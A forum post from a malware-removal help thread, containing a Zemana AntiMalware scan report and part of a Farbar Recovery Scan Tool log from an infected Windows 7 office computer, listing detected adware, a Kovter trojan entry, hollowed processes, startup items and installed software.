CGTIII

Members

View Profile See their activity

Posts
15
Joined
November 19, 2016
Last visited
December 15, 2016

Content Type

All Activity

Events

Profiles

Forums

Topics
Posts

Everything posted by CGTIII

Infection and Freezing

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Glad to have someone so experienced. You folks have competitions? Zemana AntiMalware 2.70.2.25 (Installed) ------------------------------------------------------- Scan Result : Completed Scan Date : 2016/12/7 Operating System : Windows 7 64-bit Processor : 2X Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz BIOS Mode : Legacy CUID : 120980A89B4BED509B53A6 Scan Type : System Scan Duration : 20m 39s Scanned Objects : 78762 Detected Objects : 18 Excluded Objects : 0 Read Level : Normal Auto Upload : Enabled Detect All Extensions : Disabled Scan Documents : Disabled Domain Info : IDS,1,3 Detected Objects ------------------------------------------------------- iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14524 File - %programfiles%\internet explorer\iexplore.exe iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14524 File - %programfiles%\internet explorer\iexplore.exe iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14052 File - %programfiles%\internet explorer\iexplore.exe rundll32.exe Status : Scanned Object : %systemroot%\syswow64\rundll32.exe MD5 : 51138BEEA3E2C21EC44D0932C71762A8 Publisher : Microsoft Windows Size : 44544 Version : 6.1.7600.16385 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 1308 - C:\Windows\SysWOW64\rundll32.exe File - %systemroot%\syswow64\rundll32.exe rundll32.exe Status : Scanned Object : %systemroot%\syswow64\rundll32.exe MD5 : 51138BEEA3E2C21EC44D0932C71762A8 Publisher : Microsoft Windows Size : 44544 Version : 6.1.7600.16385 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 676 - C:\Windows\SysWOW64\rundll32.exe File - %systemroot%\syswow64\rundll32.exe Hosts File Status : Scanned Object : %systemroot%\system32\drivers\etc\hosts MD5 : 6A4029CFF35FD4BA34C001C1ED5D9945 Publisher : - Size : 27 Version : - Detection : Hosts Hijack Cleaning Action : Repair Related Objects : Hosts file - 127.0.0.1 - ca File - %systemroot%\system32\drivers\etc\hosts ShopAtHomeUpdater.exe.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomeupdater.exe.vir MD5 : 34BA770EDE3145CD052DCC1C49DF6077 Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 199864 Version : 7.10.2.10 Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomeupdater.exe.vir ShopAtHomeHelperPS.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelperps.dll.vir MD5 : AAF42A00AE49E8B02E4DE14D8A850254 Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 54456 Version : 7.10.2.10 Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelperps.dll.vir ShopAtHomeWatcher.exe.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomewatcher.exe.vir MD5 : 339F02063C8E27BFC3CFAC8B522FF033 Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 138048 Version : 7.10.8.4 Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomewatcher.exe.vir APNIC.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\programdata\ask\apn-stub\ad5\apnic.dll.vir MD5 : 8389842EC050DDF21585829675798C2D Publisher : Ask.com Size : 213192 Version : 5.2.3.0 Detection : Adware:Win32/AskBrowserHijack!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\programdata\ask\apn-stub\ad5\apnic.dll.vir TBUpdaterLogic_1.0.0.1.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.1.dll.vir MD5 : DBA5610430A43DCC2D1FE60905C078A7 Publisher : Conduit Ltd. Size : 278272 Version : 1.0.0.1 Detection : Win32/Adware.Conduit!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.1.dll.vir BackgroundContainer.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\backgroundcontainer.dll.vir MD5 : FD42EA980FE1833B3A5EB429273CD1B2 Publisher : Conduit Ltd. Size : 319264 Version : 1.0.0.15 Detection : Win32/Adware.Conduit!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\backgroundcontainer.dll.vir TBVerifier.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\program files (x86)\conduit\ct3306061\plugins\tbverifier.dll.vir MD5 : 88F395EC3145BF31786738261F0C373F Publisher : Conduit Ltd. Size : 297248 Version : 3.0.0.2 Detection : Win32/Adware.Conduit!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\program files (x86)\conduit\ct3306061\plugins\tbverifier.dll.vir RibbonConfig.exe.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\ribbonconfig.exe.vir MD5 : E0DF66E7A5654F956442DFF81009E5D5 Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 153784 Version : - Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\ribbonconfig.exe.vir Exec.exe.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\exec.exe.vir MD5 : 386B88945F182E98F7521A7F2D570C8F Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 62136 Version : - Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\exec.exe.vir TBUpdaterLogic_1.0.0.2.dll.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.2.dll.vir MD5 : 1E6D9E1EB2729FC9879B666695D6F46A Publisher : Conduit Ltd. Size : 278272 Version : 1.0.0.2 Detection : Win32/Adware.Conduit!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.2.dll.vir ShopAtHomeHelper.exe.vir Status : Scanned Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelper.exe.vir MD5 : 49B2E542A7ED7C44A2C4F84B5008DF72 Publisher : ShopAtHome.com (Belcaro Group, Inc.) Size : 1125184 Version : 7.10.8.4 Detection : Adware:Win32/ShopAtHome!Ep Cleaning Action : Quarantine Related Objects : File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelper.exe.vir d848.lnk Status : Scanned Object : NE->c:\users\reception\appdata\local\7b8b\d848.lnk MD5 : - Publisher : - Size : - Version : - Detection : Trojan:Win32/Kovter.B!Neng Cleaning Action : Quarantine Related Objects : (null) - (null) Cleaning Result ------------------------------------------------------- Cleaned : 13 Reported as safe : 0 Failed : 5 Failed Objects ------------------------------------------------------- rundll32.exe Status : Scanned Object : %systemroot%\syswow64\rundll32.exe MD5 : 51138BEEA3E2C21EC44D0932C71762A8 Publisher : Microsoft Windows Size : 44544 Version : 6.1.7600.16385 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 676 - C:\Windows\SysWOW64\rundll32.exe File - %systemroot%\syswow64\rundll32.exe rundll32.exe Status : Scanned Object : %systemroot%\syswow64\rundll32.exe MD5 : 51138BEEA3E2C21EC44D0932C71762A8 Publisher : Microsoft Windows Size : 44544 Version : 6.1.7600.16385 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 1308 File - %systemroot%\syswow64\rundll32.exe iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14052 File - %programfiles%\internet explorer\iexplore.exe iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14524 File - %programfiles%\internet explorer\iexplore.exe iexplore.exe Status : Scanned Object : %programfiles%\internet explorer\iexplore.exe MD5 : 9D2F4943A1127CAC62011A185DE78F48 Publisher : Microsoft Corporation Size : 815304 Version : 11.0.9600.18523 Detection : Hollow Process Cleaning Action : Repair Related Objects : Process - 14524 File - %programfiles%\internet explorer\iexplore.exe Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 07-12-2016 Ran by Reception (administrator) on PC-4 (07-12-2016 06:03:41) Running from \\SPARTA\RedirectedFolders\Reception\Desktop Loaded Profiles: Clayton & dcreery & blagler & Reception (Available Profiles: Clayton & dcreery & blagler & Reception) Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files (x86)\Backblaze\bzserv.exe (FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.kpr () C:\Windows\SysWOW64\PSIService.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe (Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe (Farbar) \\SPARTA\RedirectedFolders\Reception\Desktop\FRST64.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-07-26] (Apple Inc.) HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.) HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [13915888 2016-11-22] (Zemana Ltd.) HKLM-x32\...\Run: [FileZilla Server Interface] => C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe [2452480 2015-01-09] (FileZilla Project) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-12-06] (Malwarebytes) Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.) Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_winlogonx64.dll (Citrix Systems, Inc.) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Run: [**suokibuts<*>] => "C:\Users\Reception\AppData\Local\7b8b\d848.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation) HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-14] () IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\0783.lnk [2016-10-12] ShortcutTarget: 0783.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\356a.lnk [2016-12-07] ShortcutTarget: 356a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\5cf1.lnk [2016-11-23] ShortcutTarget: 5cf1.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{0B496D74-E088-4F45-B2FD-58E5E9F5F3E1}: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{A4BE6A85-3332-4C3B-A231-82D7AFF8DAF1}: [DhcpNameServer] 172.20.10.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\s-1-5-21-1158510682-2263174364-945799988-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope {1A6ECD44-6984-4DCD-B3DF-84F92EC8DA9E} URL = BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg.dll => No File BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-12-18] (Adobe Systems Incorporated) Toolbar: HKU\s-1-5-21-3320201264-2921037059-4171379232-1166 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg32.dll No File Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Client Server Security Agent\UIFramework\ProToolbarIMRatingActiveX.dll No File FireFox: ======== FF ProfilePath: C:\Users\Reception\AppData\Roaming\Mozilla\Firefox\Profiles\biqbxlip.default-1478011673580 [2016-11-09] FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\firefoxextension => not found FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-05-13] [not signed] FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-04-03] [not signed] FF HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] () FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] () FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation) FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2014-02-18] (RocketLife, LLP) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-02-15] (Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-12-18] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1192: @citrixonline.com/appdetectorplugin -> C:\Users\Reception\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-05] (Citrix Online) Chrome: ======= CHR Profile: C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default [2016-12-06] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-09] CHR Extension: (Avast Online Security) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09] CHR Extension: (Chrome Web Store Payments) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-09] CHR Extension: (Chrome Media Router) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-06] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.) R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-14] () R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [774656 2015-01-09] (FileZilla Project) [File not signed] S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-06-05] (Citrix Online, a division of Citrix Systems, Inc.) S3 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_service.exe [610528 2016-01-12] (Citrix Systems, Inc.) R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed] R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.) R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.) R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed] R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed] R2 PrintTracker; C:\Program Files (x86)\Print Tracker\PMonitor.exe [722400 2016-07-11] (Print Tracker (866) 629-3342) R2 ProtexisLicensing; C:\Windows\SysWOW64\PSIService.exe [174656 2006-11-02] () [File not signed] R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation) R3 SmcService; C:\Program Files (x86)\Symantec\Symantec 